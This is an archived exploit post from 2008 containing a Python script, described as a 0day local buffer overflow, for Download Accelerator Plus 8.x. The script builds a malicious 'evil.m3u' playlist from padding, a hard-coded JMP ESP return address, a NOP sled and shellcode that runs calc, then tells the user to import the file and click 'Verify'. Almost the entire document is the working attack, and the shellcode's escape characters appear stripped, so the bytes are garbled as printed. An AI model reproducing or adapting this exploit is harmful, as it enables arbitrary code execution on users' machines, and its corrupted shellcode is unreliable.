
dap-overflow.txt

Posted on 10 July 2008

#!/usr/bin/python # Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish # Shellcode: Windows Execute Command (calc) # Just for fun ;] ## from struct import pack shellcode = ( "x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6" "xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7" "x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58" "x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae" "x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60" "xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf" "xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70" "x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33" "xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04" "x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2") RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish) m3u = 'http://localhost/verify_me________________________________%s.mp3' buf = 'A' * 14074 buf += pack('<L', RET) buf += 'x90' * 32 buf += shellcode m3u %= buf fd = open('evil.m3u', 'wb') fd.write(m3u) fd.close() print 'DONE, import the evil.m3u and click "Verify"' # EoF

 
